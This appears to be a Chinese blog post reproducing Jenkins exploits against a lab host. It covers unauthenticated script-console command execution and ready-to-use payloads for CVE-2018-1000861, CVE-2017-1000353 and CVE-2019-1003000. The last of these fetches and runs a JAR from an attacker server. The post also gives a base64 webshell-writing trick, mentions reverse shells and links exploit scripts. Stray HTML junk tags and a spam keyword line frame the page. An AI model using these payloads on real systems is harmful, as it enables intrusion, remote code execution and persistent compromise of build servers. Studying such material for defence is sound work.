<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Jenkins漏洞利用復現

    VSole2021-11-17 08:08:12

    一、未授權訪問

    訪問url:

    http://172.16.20.134:8080/script
    

    命令執行

    println "ls -al".execute().text
    

    也可以利用powershell 或者python腳本反彈shell

    二、CVE-2018-1000861 遠程命令執行漏洞

    payload:

    securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"touch /tmp/success".execute()  }}
    

    &value=轉成url編碼

    發送get請求:

    python腳本:

    https://github.com/orangetw/awesome-jenkins-rce-2019/blob/master/exp.py
    

    三、CVE-2017-1000353 遠程代碼執行

    工具地址:https://github.com/vulhub/CVE-2017-1000353

     https://ssd-disclosure.com/archives/3171

    # 生成serjava -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar 1.ser "touch /tmp/1.jsp"
    # 發送serpython exploit.py http://172.16.20.134:8080 1.ser
    

    exploit.py這里要注釋下,如果你使用代理的話可以添加,這里只是復現,用不到

     另外一個linux寫shell的小技巧:

    echo base64后的木馬內容 |base64 -d > 1.js
    

    jsp生成成功

    四、CVE-2019-1003000  遠程代碼執行漏洞

    漏洞利用

    http://url.com/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name='payload', root='http://poc.com')%0a@Grab(group='package', module='payload', version='1')%0aimport Payload;
    

    poc.com是保存了JAR文件的服務器域名。

    group、module、version的值對應了該jar文件的存放路徑。

    修改version的值,對應的jar包的訪問路徑和文件名也發生改變。

    腳本:https://github.com/wetw0rk/Exploit-Development/blob/master/CVE-2019-1003000%20%26%26%20CVE-2018-1999002%20-%20preAuth%20Jenkins%20RCE/sploit/jenkins-preauth-rce-exploit.py

    https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc

    jenkinsjenkins使用
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    DevOps 是 Development 和 Operations 組合的縮寫詞,它指的是一種協作方法,使企業的應用程序開發團隊(Development team)和 IT 運營團隊(Operations team)能夠更好地溝通工作,DevOps的概念有助于使技術項目與業務需求保持一致,從而提高企業整體的工作效率 [1]。
    將Sonar引入到代碼開發的過程中,提供靜態源代碼安全掃描能力。
    Scanners-Box 指引#簡介#Scanners-Box是一個集合github平臺上的安全行業從業人員自研開源掃描器的倉庫,包括子域名枚舉、數據庫漏洞掃描、弱口令或信息泄漏掃描、端口掃描、指紋識別以及其他大型掃描器或模塊化掃描器;該倉庫只收錄各位網友自己編寫的一般性開源掃描器,類似nmap、w3af、brakeman等知名掃描工具不收錄。
    漏洞及滲透練習平臺 數據庫注入練習平臺 花式掃描器 信息搜集工具 WEB工具 windows域滲透工具 漏洞利用及攻擊框架 漏洞POC&EXP 中間人攻擊及釣魚 密碼pj 二進制及代碼分析工具 EXP編寫框架及工具 隱寫相關工具 各類安全資料 各類CTF資源 各類編程資源 Python
    Jenkins Server 軟件中的一個嚴重漏洞CVE-2019-17638可能導致內存損壞并導致機密信息泄露。Jenkins是最受歡迎的開源自動化服務器,由CloudBees和Jenkins社區維護。“ Jenkins 至和LTS 至捆綁了帶有安全漏洞CVE-2019-17638的。此漏洞可能允許未經身份驗證的攻擊者獲得HTTP響應報頭,其中可能包含打算用于其他用戶的敏感數據。”該漏洞影響Jetty和Jenkins Core,該漏洞在Jetty版本中引入,用于處理大型HTTP響應報頭并防止緩沖區溢出。
    逆推這個漏洞本身不難,主要記錄下思路。
    宣布:從 6 月 28 日發布的 Jenkins 2.357 和即將發布的 9 月 LTS 版本開始,Jenkins 最低需要 Java 11。自 2005 年成立以來,Jenkins 項目經歷了多次 Java 遷移。
    必修漏洞,就是必須修復、不可拖延的高危漏洞,不修復就意味著被黑客攻擊入侵后會造成十分嚴重的后果。
    云原生化成為企業數字化轉型的高效方式,各大行業開始加速云原生化步伐。為了解決云原生安全帶來的新挑戰,提高應用服務全生命周期安全管理效率,國內某制造業企業通過青藤蜂巢·云原生安全平臺,實現了這一目標。通過采用云原生架構,部署青藤蜂巢產品,為某制造業企業的數字化創新提供了堅實的基礎支撐,最大限度的減少了安全瓶頸的發生頻率。隨著技術架構的升級,云原生在行業的應用范圍還將會不斷擴大。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类